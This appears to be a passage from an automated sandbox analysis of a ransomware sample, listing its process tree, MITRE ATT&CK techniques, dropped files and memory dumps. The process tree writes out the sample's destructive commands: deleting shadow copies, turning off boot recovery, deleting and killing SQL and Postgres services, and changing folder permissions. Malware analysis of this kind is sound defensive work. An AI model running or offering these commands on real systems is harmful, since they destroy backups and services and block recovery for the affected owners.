- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\ProgramData /a
    3⤵
    - Modifies file permissions
    PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /g Administrators:f
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Users:r
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /g Administrators:r
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1456
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d SERVICE
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssqlserver
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d "network service"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d system
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\ProgramData /e /d mssql$sqlexpress
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Users\Public /a
    3⤵
    - Modifies file permissions
    PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /g Administrators:f
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Users:r
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:312
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /g Administrators:r
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:284
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d SERVICE
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssqlserver
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d "network service"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d system
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Users\Public /e /d mssql$sqlexpress
    3⤵
    PID:3348
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
    3⤵
    PID:3788
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "MSSQLFDLauncher"
      4⤵
      Launches sc.exe
      PID:2168
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1416

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat

Filesize
10KB

MD5
1726416850d3bba46eeb804fae57083d

SHA1
7e7957d7e7fd7c27b9fb903a0828b09cbb44c196

SHA256
c207a7a561ab726fb272b5abd99c4da8e927b5da788210d5dd186023c2783990

SHA512
7747e5c6bd77a43ee958cb7b533a73757e8bfb7b3706af4eb7ec9a99458720f89cd30bb23b4cb069826dc36a6ce737424ad0007307be67a7391591f6c936df27

Download Submit
F:\HOW TO BACK FILES.txt

Filesize
1KB

MD5
d0fad9b28e47d5e0a5ca8ab257e17355

SHA1
a7a6021d88ec4db708675159431934c6ebbc4ba1

SHA256
1c5c49da95d94bbf42cadda2a4034575ea2081188661f60e41c02c7142653ea5

SHA512
84bedf95f0c938c041af95f8ef727051352c5d7c99100009f7e98b3a4b1513b0adc9097e09b44053c3642809f39b7f72b36d99315ed22be9714dd1f67220dd09

Download Submit
memory/4508-34-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-20-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-9958-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-9962-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-9930-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-3110-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-2936-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-13-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-14-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-16-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-18-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-2975-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-33-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-23-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-24-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-25-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-28-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-26-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-30-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-29-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-31-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-32-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-2853-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-2851-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-43-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-37-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-38-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-39-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-40-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-41-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-42-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-35-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-45-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-48-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-44-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-53-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-597-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4508-58-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/4692-1-0x0000000000F60000-0x0000000000F74000-memory.dmp

Filesize
80KB

Download
memory/4692-0-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/4692-3-0x0000000006D10000-0x0000000006D66000-memory.dmp

Filesize
344KB

Download
memory/4692-19-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/4692-2-0x0000000005AD0000-0x0000000005AE0000-memory.dmp

Filesize
64KB

Download
memory/4692-10-0x00000000079E0000-0x0000000007F84000-memory.dmp

Filesize
5.6MB

Download
memory/4692-7-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/4692-5-0x0000000006F70000-0x0000000006FBC000-memory.dmp

Filesize
304KB

Download
memory/4692-4-0x0000000006E60000-0x0000000006EA4000-memory.dmp

Filesize
272KB

Download